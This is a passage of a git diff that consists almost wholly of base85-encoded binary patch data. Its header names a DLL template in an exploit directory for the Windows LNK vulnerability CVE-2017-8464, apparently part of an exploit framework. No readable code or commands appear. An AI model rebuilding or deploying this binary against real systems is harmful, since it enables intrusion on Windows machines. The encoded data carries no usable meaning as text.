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

MLEz$_gaj79_4T+;f>08I|3!z zT8XW`k$QD2D=)|WU1Ni7b*;!2AXnSCth@$(!g~`dudHucUe1fy#k%rZ3=uj}&sucl zXm=&ch%47>?ujdRHgMkk`pRXE4v{^oN2r2>zq!!YIBd8a+@r5qMJC`aN?)&)eWS0p z)mPbJ$;F1I+T{(E_=Vgxh9=QbXTz@#rxVpsRc~jv8JcVCj@kyX26LMBs{h7xbJ6@; zimbTuq^nXq6Jg8$YpQQ*u5yS`jimMOyxEhfa{56dpW?B2?4GdaxX0qP zLuv^K*g`W3&j`vIq&I~RIt_aG( zVDPoz7s06^d*~OTK#g*x_xRDqr=C=AwztG<^RD%Jy}P}idcX0e`u@dN z>=S)%-*0?Jd?$RCPPEsd?yaeO?sctG3ZxDS69 zdNcGHm9?lklRTGsW_cEP>O29@bDo2qZ#^04MCh_jBJ1z7Kq5ft3MQ;E6yM z+0w7-sp~$_T}NYU*0bvX2|ZW$l=iIYdA#Sd9&_-(Bq+= z(ALo2&|zvjM^7Qa#(A#x%<+_Y$~{Kkk9>k}sqY@&I^UDNXMG?0uJZrbZ}qSAOa2Z1 zr~SY6@An_{f9OBupGh{f==r~&DeGC+v$5xuo@;_P2k#Cx1%Dp&1)s-AeiBRyWrXrW zOG6KbSchugHJ+P2cYE&jxIIsypNBmkdUW2&-aK!EcY}Ap`;PYu?_a!=d{_CHANn`r zzx@Ed@TK`5_y5j+LBJ9y3EUm153~h-73c}<4;%@66gU;Ib^f}uuk*Fek2;Tce%pCL z*Q~DgE^pVCu5j0DT_1JDcc*vfcHh{2Yj<^bL-&2%^2V~K{`INx{|Uv+z++_Hrf)W7 z_RQ(2>IwD42d4+E!41LZf*%AYhMGhF5qdpD{~Ty4NqeSxYCK(@0naf{p7-Cq`(W=W z?_OV=|9byie|F%Oz`FrfYT#r2d=DzL7!->>-7(0@-Lt#fhb#?G{^3iR)E rm(X3&y}G-jd$2okW6s9K8(TJR-gtUr=2I-J+Hnt!^ZDn0ln4F~E=xCR 
diff --git a/data/exploits/cve-2017-8464/template_x86_windows.dll b/data/exploits/cve-2017-8464/template_x86_windows.dll old mode 100755 new mode 100644 index b95dfe5232b73f48b2773b4add296114d6793b69..eeef7fb413215ccc7b676fda2873ece79e5e1b8b GIT binary patch literal 17408 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 